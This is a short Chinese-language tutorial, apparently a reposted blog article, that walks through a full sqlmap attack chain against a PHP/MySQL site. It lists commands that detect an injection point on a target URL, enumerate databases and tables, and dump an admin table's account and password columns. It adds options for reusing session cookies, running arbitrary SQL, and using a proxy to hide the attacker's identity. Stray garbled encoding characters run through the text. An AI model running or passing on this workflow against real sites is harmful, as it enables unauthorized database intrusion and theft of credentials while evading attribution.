sqlmap注入常見用法一條龍
sqlmap是一個(gè)灰常強(qiáng)大的sql注入檢測(cè)與輔助工具,但是由于沒有圖形界面,基本上用起來比較麻煩����,導(dǎo)致很多人可能寧愿用havij或者是pangolin也不愿意麻煩去翻幫助界面,我自己也是把很多語(yǔ)句貼到了一個(gè)記事本里面用�,其實(shí)真正用起來也就5,6句��,也不會(huì)太復(fù)雜��,下文以php+mysql為例:
檢查注入點(diǎn)sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11
列數(shù)據(jù)庫(kù)信息sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs
指定庫(kù)名列出所有表sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables
指定庫(kù)名表名列出所有字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns
指定庫(kù)名表名字段dump出指定字段sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump
有幾個(gè)參數(shù)可能會(huì)用到,直接加在***面就可以了����,更多詳細(xì)參數(shù)見官方文檔:
--cookie=COOKIE 在需要登錄的地方,需要登錄后的cookie
--proxy="http://127.0.0.1:8087" 使用HTTP代理隱藏自己的身份���,比如使用goagent等
--sql-query=QUERY 執(zhí)行一個(gè)sql語(yǔ)句��,不一定支持
過程的幾張圖如下:
文章題目:sqlmap注入常見用法一條龍
本文網(wǎng)址:
http://uogjgqi.cn/article/djspddg.html
掃二維碼與項(xiàng)目經(jīng)理溝通
我們?cè)谖⑿派?4小時(shí)期待你的聲音
解答本文疑問/技術(shù)咨詢/運(yùn)營(yíng)咨詢/技術(shù)建議/互聯(lián)網(wǎng)交流
